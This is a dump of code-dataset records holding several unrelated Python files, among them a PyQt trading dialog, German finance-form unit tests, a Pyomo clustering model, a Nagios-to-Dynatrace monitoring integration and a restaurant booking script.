QtGui.QTableWidgetItem(\"\")\n\t\t\t\tself.stock_A_tableWidget.setItem(i,j,newItem1)\n\t\t\t\tnewItem2 = QtGui.QTableWidgetItem(\"\")\n\t\t\t\tself.stock_B_tableWidget.setItem(i,j,newItem2)\n\t\t\t\tif not j:\n\t\t\t\t\tif i <= 4:\n\t\t\t\t\t\tnewItem1.setForeground(QtGui.QColor(\"red\"))\n\t\t\t\t\t\tnewItem2.setForeground(QtGui.QColor(\"red\"))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewItem1.setForeground(QtGui.QColor(\"green\"))\n\t\t\t\t\t\tnewItem2.setForeground(QtGui.QColor(\"green\"))\n\t\t\t\tif i == 4:\n\t\t\t\t\tnewItem1.setBackground(QtGui.QColor(226,244,235,100))\n\t\t\t\t\tnewItem2.setBackground(QtGui.QColor(226,244,235,100))\n\t\t\t\tif i == 5:\n\t\t\t\t\tnewItem1.setBackground(QtGui.QColor(252,221,222,100))\n\t\t\t\t\tnewItem2.setBackground(QtGui.QColor(252,221,222,100))\n\t#初始化窗口元件事件关联\n\tdef initEventConnection(self):\n\t\t#计算配对系数\n\t\tself.stock_A_Price_doubleSpinBox.valueChanged.connect(self.getPairValue)\n\t\tself.stock_B_Price_doubleSpinBox.valueChanged.connect(self.getPairValue)\n\t\t#打开交易对话框\n\t\tself.stock_A_tableWidget.cellDoubleClicked.connect(self.updatePriceA)\n\t\tself.stock_B_tableWidget.cellDoubleClicked.connect(self.updatePriceB)\n\t\t#对话提交\n\t\tself.buttonBox.accepted.connect(self.accept) # 确定\n\t\tself.buttonBox.rejected.connect(self.reject) # 取消\n\tdef 
initPara(self):\n\t\tself.pairKey_label.setText(self.pairKey)\n\t\tself.trade_Type_label.setText(self.tradePoint[\"type\"])\n\t\tself.dealTime_dateTimeEdit.setDateTime(self.tradePoint[\"dateTime\"])\n\n\t\tself.stock_A_List_label.setText(self.tradePoint[\"stock_A\"])\n\t\tself.stock_A_label.setText(self.tradePoint[\"stock_A\"])\n\t\tself.stock_A_Direction_label.setText(self.tradePoint[\"dirc_A\"])\n\t\tself.stock_A_Price_doubleSpinBox.setValue(self.tradePoint[\"pa\"])\n\t\tself.stock_A_Price_doubleSpinBox.setSingleStep(0.01)\n\t\tself.stock_A_Vol_spinBox.setSingleStep(100)\n\t\tself.stock_A_Vol_spinBox.setRange(100,1000)\n\n\t\tself.stock_B_List_label.setText(self.tradePoint[\"stock_B\"])\n\t\tself.stock_B_label.setText(self.tradePoint[\"stock_B\"])\n\t\tself.stock_B_Direction_label.setText(self.tradePoint[\"dirc_B\"])\n\t\tself.stock_B_Price_doubleSpinBox.setValue(self.tradePoint[\"pb\"])\n\t\tself.stock_B_Price_doubleSpinBox.setSingleStep(0.01)\n\t\tself.stock_B_Vol_spinBox.setSingleStep(100)\n\t\tself.stock_B_Vol_spinBox.setRange(100,1000)\n\t\t#获得量\n\t\tif self.tradePoint[\"type\"] == \"open\":\n\t\t\tself.stock_A_Vol_spinBox.setValue(self.tradePoint[\"vol_a\"])\n\t\t\tself.stock_B_Vol_spinBox.setValue(self.tradePoint[\"vol_b\"])\n\t\telse:\n\t\t\ttry:\n\t\t\t\topenPoint = self.QMain.positionsPair[self.pairKey][-1]\n\t\t\t\tself.stock_A_Vol_spinBox.setValue(openPoint[\"vol_a\"])\n\t\t\t\tself.stock_B_Vol_spinBox.setValue(openPoint[\"vol_b\"])\n\t\t\texcept Exception:\n\t\t\t\tpass\t\t\t\n\t\t#计算配对系数\n\t\tself.getPairValue(0)\n\t\t#设置阈值\n\t\tself.open_label.setText(str(self.pairPara[\"open\"]))\n\t\tself.close_label.setText(str(self.pairPara[\"close\"]))\n\t\tself.stop_label.setText(str(self.pairPara[\"stop\"]))\n\t#计算配对系数\n\tdef getPairValue(self,value):\n\t\tSt = np.log(self.stock_A_Price_doubleSpinBox.value()) - self.pairPara[\"beta\"]*np.log(self.stock_B_Price_doubleSpinBox.value())\n\t\tS = (St - self.pairPara[\"mean\"])/self.pairPara[\"std\"]\n\t\tself.pair_Value_label.setText(str(S))\n\t#获得单数据\n\tdef updateVol(self):\n\t\tvolList_A = self.QMain.pairTradeStatus[self.pairKey][\"volList_A\"]\n\t\tvolList_B = self.QMain.pairTradeStatus[self.pairKey][\"volList_B\"]\n\t\tfor i in xrange(10):\n\t\t\tfor j in xrange(2):\n\t\t\t\tself.stock_A_tableWidget.item(i,j).setText(str(volList_A[i][j]))\n\t\t\t\tself.stock_B_tableWidget.item(i,j).setText(str(volList_B[i][j]))\n\t#更新保单价格\n\tdef updatePriceA(self, row, column):\n\t\tnewPrice = self.stock_A_tableWidget.item(row, 0).text()\n\t\tself.stock_A_Price_doubleSpinBox.setValue(float(newPrice))\n\tdef updatePriceB(self, row, column):\n\t\tnewPrice = self.stock_B_tableWidget.item(row, 0).text()\n\t\tself.stock_B_Price_doubleSpinBox.setValue(float(newPrice))\n\t#得到真实交易点\n\tdef getTrueTradePoint(self):\n\t\ttradePoint = copy.copy(self.tradePoint)\n\t\ttradePoint[\"dateTime\"] = self.dealTime_dateTimeEdit.dateTime().toPyDateTime()\n\t\ttradePoint[\"pa\"] = self.stock_A_Price_doubleSpinBox.value()\n\t\ttradePoint[\"vol_a\"] = self.stock_A_Vol_spinBox.value()\n\t\ttradePoint[\"pb\"] = self.stock_B_Price_doubleSpinBox.value()\n\t\ttradePoint[\"vol_b\"] = self.stock_B_Vol_spinBox.value()\n\t\treturn tradePoint","repo_name":"sharmaking/CoIntegrationAnalysis","sub_path":"tradeDialogWindow.py","file_name":"tradeDialogWindow.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28485277775","text":"import json\nfrom typing import List\n\nfrom sql_storage import EventRepository\nfrom models import group_by_dates, Event\nfrom duplicate_detector import DuplicateEventsRemover\n\n\ndef load_events(folder) -> List[Event]:\n with open(\"%s\\\\events.json\" % folder, \"r\", encoding=\"utf-8\") as f:\n events = json.load(f)\n events = [Event.from_json(e) for e in events]\n return events\n\n\ndef save_to_storage(folder):\n repository = EventRepository()\n duplicate_remover = DuplicateEventsRemover()\n events = load_events(folder)\n events_by_date = group_by_dates(events)\n\n for date, events in events_by_date.items():\n events_to_save = []\n ids_to_remove = []\n existing_events = list(repository.list_events_by_date(date))\n duplicate_list = duplicate_remover.detect_duplicates(existing_events + events)\n for duplicates in duplicate_list:\n if len(duplicates) == 1:\n unique_event = duplicates[0]\n else:\n if any([not e.timestamp for e in duplicates]):\n unique_event = max(duplicates, key=lambda e: len(e.to_str()))\n else:\n unique_event = max(duplicates, key=lambda e: e.timestamp)\n\n duplicates = [d for d in duplicates if d != unique_event]\n ids_to_remove.extend([e.event_id for e in duplicates if e.event_id])\n\n if not unique_event.event_id:\n events_to_save.append(unique_event)\n repository.save_events(events_to_save)\n repository.remove_events(ids_to_remove)\n\n\nif __name__ == \"__main__\":\n save_to_storage(\"C:\\\\Projects\\\\Research\\\\Events\\\\data\\\\event_data\\\\raw_data\\\\2020_5_29\")\n","repo_name":"creeston/Events","sub_path":"scripts/save_to_storage.py","file_name":"save_to_storage.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13168953147","text":"from hamcrest import equal_to, assert_that, instance_of\n\nfrom app.common.util import safe_get, get_custom_value\nfrom app.consorsfinanz.flows.submit.models.vorgang_marktplatz_model import VorgangMarktplatzModel, Stammdaten, \\\n FamilienstandEnum, Kind, BeschaeftigungsartEnum, Bonitaetsangaben, MietAusgaben, WohnartEnum, AnredeEnum, \\\n TitleEnum, Unterhaltsverpflichtungen, PartnerCustom, Custom, Immobilie, Darlehen\n\n\ndef test_get_custom_value():\n partner_custom_list = [\n Custom(key=\"zeitpunktKontoeroeffnungAs1\", value=\"2014-10-20T13:14:07.712+02:00\"),\n Custom(key=\"finanzierungszweckBeschreibung\", value=\"AMA\"),\n Custom(key=\"datenweitergabe\", value=None)\n ]\n\n assert_that(get_custom_value(partner_custom_list, \"zeitpunktKontoeroeffnungAs1\"),\n equal_to(\"2014-10-20T13:14:07.712+02:00\"))\n\n assert_that(get_custom_value(partner_custom_list, \"finanzierungszweckBeschreibung\"), equal_to(\"AMA\"))\n\n assert_that(get_custom_value(partner_custom_list, \"datenweitergabe\"), equal_to(None))\n\n\ndef test_get_custom_value_empty_list():\n partner_custom_list = []\n\n assert_that(get_custom_value(partner_custom_list, \"zeitpunktKontoeroeffnungAs1\"), equal_to(None))\n\n\ndef test_safe_get():\n # GIVEN\n vorgang = VorgangMarktplatzModel(\n partner=PartnerCustom(custom=[\n Custom(key=\"finanzierungszweckBeschreibungAs1\", value=\"AMA\")\n ]),\n stammdaten=Stammdaten(\n anredeAs1=AnredeEnum.HERR,\n titelAs1=[TitleEnum.DOKTOR],\n vornameAs1=\"Hans\",\n nachnameAs1=\"Dampf\",\n emailAs1=\"jean-marc.nadal@consorsfinanz.de\",\n strasseAs1=\"Fraunbergstr 18\",\n plzAs1=\"81379\",\n ortAs1=\"Bonn\",\n wohnhaftSeitAs1=\"2014-10-20T13:14:07.712+02:00\",\n telefonPrivatAs1=\"089832432432\",\n geburtsnameAs1=\"foo\",\n geburtsdatumAs1=\"1980-12-11T13:14:07.712+02:00\",\n staatsangehoerigkeitAs1=\"DE\",\n geburtslandAs1=\"DE\",\n wohnartAs1=WohnartEnum.IM_EIGENEN_HAUS,\n familienstandAs1=FamilienstandEnum.VERHEIRATET,\n kinder=[Kind(kindergeldFuer=\"lisa\")],\n iban=\"DE89370400440532013000\",\n einkommenMonatlichAs1=1500,\n beschaeftigungsartAs1=BeschaeftigungsartEnum.ANGESTELLTER,\n beschaeftigtSeitAs1=\"2014-10-20T13:14:07.712+02:00\",\n arbeitgeberNameAs1=\"Siemens GmbH\",\n arbeitgeberStrasseAs1=\"Hansastr. 
11\",\n arbeitgeberPlzAs1=\"80339\",\n arbeitgeberOrtAs1=\"Muenchen\",\n voranschriftStrasseAs1=\"Barstr 12\",\n voranschriftPlzAs1=\"10713\",\n voranschriftOrtAs1=\"Berlin\",\n immobilien=[Immobilie(\n darlehen=[Darlehen(\n rateMonatlich=100\n )]\n )]\n ),\n bonitaetsangaben=Bonitaetsangaben(\n mietausgaben=[MietAusgaben(\n betragMonatlich=\"1\",\n zugehoerigkeit=\"as1\"\n )],\n unterhaltsverpflichtungen=[Unterhaltsverpflichtungen(\n zugehoerigkeit=\"as1\"\n )],\n ehegattenunterhalt=[]\n )\n )\n\n foo_bar = safe_get(vorgang.dict(), \"foo\")\n foo_bar_default = safe_get(vorgang.dict(), \"foo\", \"bar\", \"y\", \"x\", return_default=0)\n bar_bar = safe_get(vorgang.dict(), \"foo\", \"bar\")\n mietausgaben_betrag_monatlich = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"mietausgaben\", \"betragMonatlich\")\n mietausgaben = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"mietausgaben\")\n ehegattenunterhalt = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"ehegattenunterhalt\", \"betragMonatlich\")\n bonitaetsangaben = safe_get(vorgang.dict(), \"bonitaetsangaben\")\n voranschrift_ort_as1 = safe_get(vorgang.dict(), \"stammdaten\", \"voranschriftOrtAs1\")\n sonstige_ausgaben = safe_get(vorgang.dict(), \"bonitaetsangaben\", \"sonstigeausgaben\")\n unterhaltsverpflichtungen_betrag_monatlich = safe_get(\n vorgang.dict(), \"bonitaetsangaben\", \"unterhaltsverpflichtungen\", \"betragMonatlich\")\n unterhaltsverpflichtungen_zugehoerigkeit = safe_get(\n vorgang.dict(), \"bonitaetsangaben\", \"unterhaltsverpflichtungen\", \"zugehoerigkeit\")\n kinder_kindergeld_fuer = safe_get(vorgang.dict(), \"stammdaten\", \"kinder\", \"kindergeldFuer\")\n partner = safe_get(vorgang.partner.dict(), \"custom\", \"value\")\n immobilien_darlehen_rate_monatlich = safe_get(vorgang.stammdaten.dict(), \"immobilien\", \"darlehen\", \"rateMonatlich\")\n\n # THEN\n assert_that(foo_bar, equal_to(None))\n assert_that(foo_bar_default, equal_to(0))\n assert_that(bar_bar, equal_to(None))\n assert_that(mietausgaben_betrag_monatlich, equal_to(\"1\"))\n assert_that(mietausgaben, instance_of(dict))\n assert_that(mietausgaben is None, equal_to(False))\n assert_that(mietausgaben[\"betragMonatlich\"], equal_to(\"1\"))\n assert_that(mietausgaben[\"zugehoerigkeit\"], equal_to(\"as1\"))\n assert_that(bonitaetsangaben, instance_of(dict))\n assert_that(bonitaetsangaben[\"mietausgaben\"][0][\"betragMonatlich\"], equal_to(\"1\"))\n assert_that(bonitaetsangaben[\"mietausgaben\"][0][\"zugehoerigkeit\"], equal_to(\"as1\"))\n assert_that(bonitaetsangaben is None, equal_to(False))\n assert_that(voranschrift_ort_as1, equal_to(\"Berlin\"))\n assert_that(sonstige_ausgaben, equal_to(None))\n assert_that(unterhaltsverpflichtungen_betrag_monatlich, equal_to(None))\n assert_that(unterhaltsverpflichtungen_zugehoerigkeit, equal_to(\"as1\"))\n assert_that(kinder_kindergeld_fuer, equal_to(\"lisa\"))\n assert_that(partner, equal_to(\"AMA\"))\n assert_that(ehegattenunterhalt, equal_to(None))\n assert_that(immobilien_darlehen_rate_monatlich, equal_to(100))\n","repo_name":"Vulonus/WetterApi","sub_path":"tests/unit/common/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42971476529","text":"def make_divistors(n):\n lower, upper = [], []\n i = 1\n while i * i <= n:\n if n % i == 0:\n lower.append(i)\n upper.append(n // i)\n i += 1\n return lower, upper\n\nN = int(input())\nA = list(map(int, input().split()))\nA.sort()\nans = 0\ndict = {}\nfor i in range(N):\n if A[i] not in dict:\n dict[A[i]] = 1\n else:\n dict[A[i]] += 1\n\n\nfor i in range(N):\n res1, res2 = make_divistors(A[i])\n for j in range(len(res1)):\n if res1[j] in dict and res2[j] in dict:\n if res1[j] != res2[j]:\n ans += dict[res1[j]] * (dict[res2[j]]) * 2\n else:\n ans += dict[res1[j]] * dict[res1[j]]\nprint(ans)","repo_name":"Okabe-Junya/AtCoderArchive","sub_path":"ABC/201-250/249/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32950123566","text":"import csv\n\nfrom pymongo import MongoClient\nfrom .mongo_queries import run_queries\nfrom ..config import data_path\nfrom csv import DictReader\nfrom ..utils import to_dict\n\nDATABASE=\"progettodb2\"\n\ndef connect(ip: str = \"localhost\", port: int = 27017) -> MongoClient:\n connection = \"mongodb://\" + ip + \":\" + str(port) + \"/\" + DATABASE\n return MongoClient(connection)\n\ndef reset(handle: MongoClient):\n handle.drop_database(DATABASE)\n\ndef load_data(handle: MongoClient):\n db = handle.progettodb2\n\n with open(data_path('cells.csv'), \"r\") as cfile:\n db.cells.insert_many(to_dict(list(DictReader(cfile))))\n\n cfile.close()\n\n with open(data_path('people.csv'), \"r\") as pfile:\n db.people.create_index(\"number\", unique=True)\n db.people.insert_many(to_dict(list(DictReader(pfile))))\n\n pfile.close()\n\n with open(data_path('calls.csv'), \"r\") as cafile:\n db.calls.insert_many(to_dict(list(DictReader(cafile))))\n\n cafile.close()\n\n print(\"[Info - MONGO]: database caricato\")\n\ndef exec(load: int, refresh: bool):\n handle = connect()\n\n if refresh:\n reset(handle)\n load_data(handle)\n\n\n run_queries(handle, load)\n\n\n\n\n","repo_name":"aloxyz/db-unime","sub_path":"src/mongo/mongo_manager.py","file_name":"mongo_manager.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17510276829","text":"from Class import *\r\nfrom Function import *\r\n \r\n# def toWaitingList(booking): # booking: Booking\r\n\r\n# def showWaitingList():\r\n\r\n\r\n# initialize restaurant info\r\nset_seats = 5\r\nr_objs = [Restaurant() for i in range(5)] # create Restaurant object list\r\nrestList = [\"A\", \"B\", \"C\", \"D\", \"E\"]\r\nday_List = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\"]\r\ntime_List = [\"9\", \"10\", \"11\", \"12\"]\r\nitem = 0\r\nfor r in r_objs:\r\n r.restName = restList[item]\r\n r.book = {}\r\n for i in day_List:\r\n for j in time_List:\r\n r.book[(i, j)] = set_seats\r\n item += 1\r\n# print(r.book)\r\n\r\nb_objs = [] # create Booking object list\r\nb_name = []\r\ntop_k = 3\r\n\r\n##### input some booking info by text document\r\ninput_path = \"input_1.txt\"\r\nwith open(input_path, 'r', newline='') as file_in:\r\n f = file_in.read().splitlines()\r\n for lines in f:\r\n value_list = lines.split(' ')\r\n b = Booking()\r\n b_objs.append(b) # record booking info\r\n # input booking information\r\n b.name = value_list[0]\r\n b_name.append(b.name)\r\n b.day = value_list[1]\r\n b.time = value_list[2]\r\n b.restName = value_list[3]\r\n b.num = int(value_list[4])\r\n\r\n for r in r_objs:\r\n if r.restName == b.restName:\r\n if r.book[(b.day, b.time)] - b.num >= 0:\r\n r.book[(b.day, b.time)] -= b.num\r\n break\r\n\r\n##### input some review info by text document\r\ninput_path = \"input_2.txt\"\r\nwith open(input_path, 'r', newline='') as file_in:\r\n f = file_in.read().splitlines()\r\n for lines in f:\r\n value_list = lines.split(' ')\r\n name = value_list[0]\r\n restName = value_list[1]\r\n review = int(value_list[2])\r\n \r\n # recalculate the review point of the restaurant and top-k rank of restaurant recommendation\r\n reviewRank = recalculate(restName, review, top_k, r_objs)\r\n # print(reviewRank.array)\r\n\r\n\r\n##### input booking info by user interface\r\nwhile True:\r\n print(\"What do you want to do?\")\r\n print(\"1. Book seat\")\r\n print(\"2. Cancel booking\")\r\n print(\"3. Modify booking\")\r\n print(\"4. Check status\")\r\n print(\"5. 
Leave comment\")\r\n \r\n user_input = input()\r\n \r\n ### Case 1:\r\n if user_input == \"1\":\r\n b = Booking()\r\n b_objs.append(b) # record booking info\r\n \r\n # input booking information\r\n b.name = input(\"Your_name:\")\r\n b_name.append(b.name)\r\n b.day = input(\"Day(Monday-Friday):\")\r\n while b.day not in day_List:\r\n print(\"Spelling error!\")\r\n b.day = input(\"Day(Monday-Friday):\")\r\n b.time = input(\"Time(9-12):\")\r\n while b.time not in time_List:\r\n print(\"Input error!\")\r\n b.time = input(\"Time(9-12):\")\r\n # list the remain seats info of restaurant\r\n for r in r_objs:\r\n r.capacity = str(r.book[(b.day, b.time)]) + \"/\" + str(set_seats)\r\n print(r.restName, \": \", r.capacity)\r\n # list the top-k recommendation according to the reviews\r\n reviewRank.array.sort()\r\n print(\"Top_\", str(top_k), \" Recommendation:\", sep = \"\")\r\n for i in reviewRank.array:\r\n print(i[1], \": \", -i[0])\r\n \r\n b.restName = input(\"Restaurant_name:\")\r\n while b.restName not in restList:\r\n print(\"Can't find!\")\r\n b.restName = input(\"Restaurant_name:\")\r\n b.num = int(input(\"Number of people:\"))\r\n\r\n # seat booking function\r\n seatBooking(b, r_objs, b_objs, b_name)\r\n \r\n ### Case 2 & Case 3:\r\n elif user_input == \"2\" or user_input == \"3\":\r\n name = input(\"Your_name:\")\r\n if name not in b_name:\r\n print(\"No booking history!\")\r\n continue\r\n\r\n # list history booking\r\n historyBooking(name, b_objs)\r\n\r\n # choose the history record to cancel or modify\r\n day = input(\"Day(Monday-Friday):\")\r\n while day not in day_List:\r\n print(\"Spelling error!\")\r\n day = input(\"Day(Monday-Friday):\") \r\n time = input(\"Time(9-12):\")\r\n while time not in time_List:\r\n print(\"Input error!\")\r\n time = input(\"Time(9-12):\")\r\n \r\n if user_input == \"2\":\r\n # cancel booking function\r\n cancelBooking(name, day, time, r_objs, b_objs, b_name)\r\n \r\n if user_input == \"3\":\r\n # modify booking function\r\n modifyBooking(name, day, time, r_objs, b_objs)\r\n\r\n ### Case 4:\r\n elif user_input == \"4\":\r\n name = input(\"Your_name:\")\r\n if name not in b_name:\r\n print(\"No booking history!\")\r\n continue\r\n\r\n # list history booking function\r\n historyBooking(name, b_objs)\r\n\r\n ### Case 5:\r\n elif user_input == \"5\":\r\n name = input(\"Your_name:\")\r\n print(\"The restaurant name you want to leave comment:\")\r\n for r in restList:\r\n # can use a drop-down list\r\n print(r)\r\n restName = input()\r\n review = int(input(\"Your point of review(1-5):\"))\r\n \r\n # recalculate the review point of the restaurant and top-k rank of restaurant recommendation\r\n reviewRank = recalculate(restName, review, top_k)\r\n\r\n ### Not sure whether can I modify class or global variable inside a non-class function without passing it as a parameter ???\r\n\r\n # print(reviewRank.array)\r\n \r\n else: \r\n continue\r\n\r\n user_input = input(\"Continue y/n?\")\r\n if user_input == \"n\":\r\n break\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Perry851211/DS_Final_Project","sub_path":"Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74584028034","text":"from pyomo import environ as pe\n\ndef create_model():\n \n m = pe.AbstractModel()\n \n m.n_days = pe.Param(\n within=pe.PositiveIntegers,\n doc='''Number of days.'''\n )\n \n m.n_clusters = pe.Param(\n within=pe.PositiveIntegers,\n doc='''Number of clusters.'''\n )\n \n m.n_extreme_days = pe.Param(\n within=pe.NonNegativeIntegers,\n initialize=0,\n doc='''Number of extreme days.'''\n )\n \n #====================================#\n # Sets\n #====================================#\n \n m.Days = pe.RangeSet(m.n_days)\n \n m.Days_cross = pe.Set(\n initialize=m.Days*m.Days,\n doc=''''''\n )\n \n m.Clusters = pe.RangeSet(m.n_clusters)\n \n #====================================#\n # Parameters\n #====================================#\n \n m.distance = pe.Param(m.Days_cross)\n \n #====================================#\n # Variables\n #====================================#\n \n m.z = pe.Var(\n m.Days_cross, \n within = pe.Binary,\n initialize=0,\n doc = '''1 iff object j is assigned to the cluster \n whose representative element is object i.'''\n )\n \n m.y = pe.Var(\n m.Days, \n within = pe.Binary,\n initialize=0,\n doc = '''1 iff object i is chosen as representative \n of its cluster.'''\n )\n \n #====================================#\n # Constraints\n #====================================#\n \n def _total_representative_days(m):\n return sum(m.y[i] for i in m.Days) == m.n_clusters\n \n m.total_representative_days = pe.Constraint(\n rule = _total_representative_days,\n doc = '''One representative day for each cluster.'''\n )\n \n def _each_non_extreme_day_is_represented(m, j):\n return sum(m.z[i,j] for i in m.Days) <= 1\n \n m.each_non_extreme_day_is_represented = pe.Constraint(\n m.Days,\n rule = _each_non_extreme_day_is_represented,\n doc='''each day is represented by exactly 1 day \n (without EDs)'''\n )\n \n def _total_represented_days(m):\n return sum(m.z[ij] for ij in m.Days_cross) == m.n_days - m.n_extreme_days\n \n m.total_represented_days = pe.Constraint(\n rule = _total_represented_days,\n doc = '''All non-extreme days are represented.'''\n )\n \n def _represented_by_representative(m, i, j):\n return m.z[i,j] <= m.y[i]\n \n m.represented_by_representative = pe.Constraint(\n m.Days_cross,\n rule = _represented_by_representative,\n doc = '''Days can only be represented by \n representative days.'''\n )\n \n #====================================#\n # Objective Function\n #====================================#\n \n def _total_distance(m):\n return sum(m.distance[ij]*m.z[ij] for ij in m.Days_cross)\n \n \n m.minimize_total_distance = pe.Objective(\n rule=_total_distance,\n doc='''Mininimize total distance between days \n of the same cluster.''' \n )\n \n return m\n \n \n \n \n ","repo_name":"GiorgioBalestrieri/typical_days_milp_clustering","sub_path":"k_medoids_milp.py","file_name":"k_medoids_milp.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"12903407109","text":"#!/usr/bin/env python\r\n\"\"\"\r\nIntegracion Nagios-Dynatrace:\r\nConsulta los datos de hosts de Nagios a traves de MK-Livestatus y envia las metricas a Dynatrace creando el CUSTOM DEVICE\r\nen caso de no existir\r\n\r\nDynatrace Type Events:\r\n AVAILABILITY_EVENT\r\n CUSTOM_ALERT\r\n CUSTOM_ANNOTATION\r\n CUSTOM_CONFIGURATION\r\n CUSTOM_DEPLOYMENT\r\n CUSTOM_INFO\r\n ERROR_EVENT\r\n MARKED_FOR_TERMINATION\r\n PERFORMANCE_EVENT\r\n RESOURCE_CONTENTION_EVENT\r\n\"\"\"\r\n\r\nimport time\r\nimport sched\r\nimport json\r\nimport App.DynatraceApp as Dyna\r\nimport App.NagiosApp as Nagios\r\nimport App.IntegrationErrors as IntegrationErrors\r\n\r\nwith open('/etc/dynatrace-integrations/config.json', 'r') as file: config = json.load(file)\r\n\r\nHOST_WHITELIST = config[\"NAGIOS\"][\"HOST_WHITELIST\"]\r\nSERVICE_WHITELIST = config[\"NAGIOS\"][\"SERVICE_WHITELIST\"]\r\n\r\nclass Integracion(object):\r\n def __init__(self):\r\n self.NagiosConn = Nagios.Connection(config[\"NAGIOS\"][\"NAGIOS_SOCKET\"])\r\n self.DynaConn = Dyna.Connection(config[\"DYNATRACE\"][\"API_URL\"], config[\"DYNATRACE\"][\"API_TOKEN\"])\r\n\r\n def CargarHosts(self):\r\n '''Obtiene el listado de hosts a monitorear'''\r\n favicon = \"http://assets.dynatrace.com/global/icons/infographic_rack.png\"\r\n tmpHosts = self.NagiosConn.getHosts()\r\n \r\n for host in tmpHosts:\r\n if (HOST_WHITELIST and host[\"name\"] in HOST_WHITELIST) or not HOST_WHITELIST:\r\n #TODO: Configurar puertos del host\r\n dHost = self.DynaConn.addCustomHost(host['name'], host['address'], ['80','8080','443','8428','9100','9104','53862','53852'], 'Nagios', favicon, '', host['groups'][0])\r\n dHost.addTag(host['groups'])\r\n\r\n def CargarMetricas(self):\r\n '''Consulta los servicios de Nagios y asigna cada una de las metricas a los CustomHosts'''\r\n\r\n for host in self.DynaConn.getHosts():\r\n lstServices = []\r\n lstTmpServices = self.NagiosConn.getMetricas(host.displayName)\r\n for nagServ in lstTmpServices:\r\n if (SERVICE_WHITELIST and nagServ[\"service_description\"] in SERVICE_WHITELIST) or not SERVICE_WHITELIST:\r\n lstServices.append(nagServ)\r\n \r\n host.clearSeries()\r\n for service in lstServices:\r\n \r\n stateError = True\r\n if (service[\"state\"] == 0): stateError = False\r\n\r\n self.DynaConn.checkIsEvent(host.displayName, service[\"description\"], stateError)\r\n\r\n lstMetricas = self.NagiosConn.parsePerfData(service[\"perf_data\"])\r\n \r\n for metrica in lstMetricas:\r\n host.addSerie(service[\"description\"], metrica, lstMetricas[metrica][0])\r\n \r\n def EnviarMetricas(self):\r\n '''Eviar los datos a Dynatrace'''\r\n self.DynaConn.sendMetrics()\r\n\r\n def EnviarEventos(self):\r\n '''Eviar los eventos a Dynatrace'''\r\n self.DynaConn.sendEvents()\r\n\r\n#####MAIN###############################################################################################################\r\noInteg = Integracion()\r\ns = sched.scheduler(time.time, time.sleep)\r\n\r\ndef programa(start, end, interval, func, args=()):\r\n event_time = start\r\n while event_time < end:\r\n s.enterabs(event_time, 0, func, args)\r\n event_time += interval\r\n\r\n s.run()\r\n\r\ndef service_integration():\r\n oInteg.CargarMetricas()\r\n oInteg.EnviarMetricas()\r\n oInteg.EnviarEventos()\r\n\r\ndef main():\r\n try:\r\n oInteg.CargarHosts()\r\n\r\n print(\"Inicio - Recoleccion de Metricas de Nagios\")\r\n\r\n #Ajustar los tiempos (+100000 1 dia)\r\n programa(time.time()+5, time.time()+100000, 90, service_integration)\r\n\r\n except 
IntegrationErrors.NagiosToDynaError as err:\r\n print(err)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"martiroman/webhooks-integrations","sub_path":"dynatrace-nagios-integration.py","file_name":"dynatrace-nagios-integration.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27657954886","text":"\n# coding: utf-8\n\n# In[291]:\n\n\nget_ipython().run_line_magic('matplotlib', 'notebook')\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy\nfrom scipy.signal import savgol_filter\nfrom scipy.signal import find_peaks\nfrom scipy.signal import boxcar\nimport glob\nfrom pathlib import Path\nimport re\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport csv\nimport seaborn as sns\nimport itertools\nfrom ipywidgets import interact, interactive, fixed, interact_manual\nimport ipywidgets as widgets\n\nsns.set(font_scale=1)\nsns.set_style(\"white\")\nsns.set_palette('gray')\nsns.set_context(\"paper\")\n\nidx=pd.IndexSlice\n\n\n# In[135]:\n\n\n#Imports all histograms with filenames as headers\n\n\n\npath = \"C:/Users/gadzo/OneDrive/Documents/Master Research/Cell Cycle Analysis/Hist_GNP_DTX_Cycle/\"\n\nall_files = Path(path)\n\nfor p in all_files.glob('*.txt'):\n print(p)\n p.rename(p.with_suffix('.csv'))\n \n\ndf = pd.concat(map(lambda file: pd.read_csv(file, sep='\\s+').drop(columns=['FL2-A', 'Fluorescence']), all_files.glob('*.csv')), axis=1)\n\n\nindex = [x.stem for x in all_files.glob('*.csv')]\ndf.columns = index\n\n\n# In[136]:\n\n\n##Change the index parameters to fit your labeling scheme\n\nnewIndex = pd.DataFrame(columns=['Cell', 'Endo/Exo', 'Cond', 'Time'])\n\n\nfor ind, c in enumerate(index):\n newIndex.loc[ind, 'Cell'] = c[0] \n newIndex.loc[ind, 'Endo/Exo'] = c[1]\n \n cSplit = re.split('(\\d+)', c[2:])\n newIndex.loc[ind, 'Cond'] = cSplit[0]+cSplit[2]\n newIndex.loc[ind, 'Time'] = int(cSplit[1])\n\nnewIndex.set_index(['Cell', 